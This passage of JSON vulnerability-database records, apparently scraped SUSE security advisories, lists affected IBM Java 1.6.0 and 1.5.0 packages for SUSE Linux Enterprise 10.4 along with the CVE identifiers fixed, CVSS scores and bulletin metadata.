"1.6.0_sr10.0-0.8.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.8.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-devel-32bit-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-alsa-1.6.0_sr10.0-0.8.1.i586.rpm", "packageName": "java-1_6_0-ibm-alsa", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.8.1.s390x.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.8.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "ppc", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.8.1.ppc.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.8.1.i586.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.8.1.s390x.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-32bit-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.8.1.i586.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.8.1.s390x.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.8.1.i586.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.8.1.s390x.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-32bit-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "ppc", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.8.1.ppc.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "ppc", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.8.1.ppc.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "ppc", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.8.1.ppc.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "ppc", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.8.1.ppc.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "ppc", "packageFilename": "java-1_6_0-ibm-64bit-1.6.0_sr10.0-0.8.1.ppc.rpm", "packageName": "java-1_6_0-ibm-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-devel-32bit-1.6.0_sr10.0-0.8.1.s390x.rpm", "packageName": "java-1_6_0-ibm-devel-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-alsa-32bit-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-alsa-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}], "description": "IBM Java 1.6.0 SR10 has been released fixing the following\n CVE's:\n\n * CVE-2011-3389\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389</a>\n >\n * CVE-2011-3516\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3516\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3516</a>\n >\n * CVE-2011-3521\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521</a>\n >\n * CVE-2011-3544\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544</a>\n >\n * CVE-2011-3545\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545</a>\n >\n * CVE-2011-3546\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3546\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3546</a>\n >\n * CVE-2011-3547\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547</a>\n >\n * CVE-2011-3548\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548</a>\n >\n * CVE-2011-3549\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549</a>\n >\n * CVE-2011-3550\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3550\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3550</a>\n >\n * CVE-2011-3551\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551</a>\n >\n * CVE-2011-3552\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552</a>\n >\n * CVE-2011-3553\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553</a>\n >\n * CVE-2011-3554\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554</a>\n >\n * CVE-2011-3556\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556</a>\n >\n * CVE-2011-3557\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557</a>\n >\n * CVE-2011-3560\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560</a>\n >\n * CVE-2011-3561\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3561\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3561</a>\n >\n\n\n", "edition": 1, "reporter": "Suse", "published": "2012-01-23T17:08:23", "title": "Security update for IBM Java (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3549", "CVE-2011-3561", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3516", "CVE-2011-3546", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552", "CVE-2011-3550"], "modified": "2012-01-23T17:08:23", "id": "SUSE-SU-2012:0114-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:55", "references": ["https://bugzilla.novell.com/731939", "http://download.novell.com/patch/finder/?keywords=f4937ae002dcdee7a337098f0e17f715"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel-32bit", "packageFilename": "java-1_5_0-ibm-devel-32bit-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-plugin", "packageFilename": "java-1_5_0-ibm-plugin-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-jdbc", "packageFilename": "java-1_5_0-ibm-jdbc-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-src", "packageFilename": "java-1_5_0-ibm-src-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-32bit", "packageFilename": "java-1_5_0-ibm-32bit-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-alsa-32bit", "packageFilename": "java-1_5_0-ibm-alsa-32bit-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-64bit", "packageFilename": "java-1_5_0-ibm-64bit-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-plugin", "packageFilename": "java-1_5_0-ibm-plugin-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-alsa", "packageFilename": "java-1_5_0-ibm-alsa-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-jdbc", "packageFilename": "java-1_5_0-ibm-jdbc-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-plugin", "packageFilename": "java-1_5_0-ibm-plugin-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-32bit", "packageFilename": "java-1_5_0-ibm-32bit-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-jdbc", "packageFilename": "java-1_5_0-ibm-jdbc-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm", "packageFilename": "java-1_5_0-ibm-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel-32bit", "packageFilename": "java-1_5_0-ibm-devel-32bit-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-32bit", "packageFilename": "java-1_5_0-ibm-32bit-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-alsa", "packageFilename": "java-1_5_0-ibm-alsa-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-alsa-32bit", "packageFilename": "java-1_5_0-ibm-alsa-32bit-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-jdbc", "packageFilename": "java-1_5_0-ibm-jdbc-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": "java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-src", "packageFilename": "java-1_5_0-ibm-src-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-demo", "packageFilename": "java-1_5_0-ibm-demo-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel-32bit", "packageFilename": "java-1_5_0-ibm-devel-32bit-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-plugin", "packageFilename": "java-1_5_0-ibm-plugin-1.5.0_sr13.0-0.5.1.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-fonts", "packageFilename": "java-1_5_0-ibm-fonts-1.5.0_sr13.0-0.5.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-demo", "packageFilename": "java-1_5_0-ibm-demo-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.5.0_sr13.0-0.5.1", "packageName": "java-1_5_0-ibm-devel", "packageFilename": 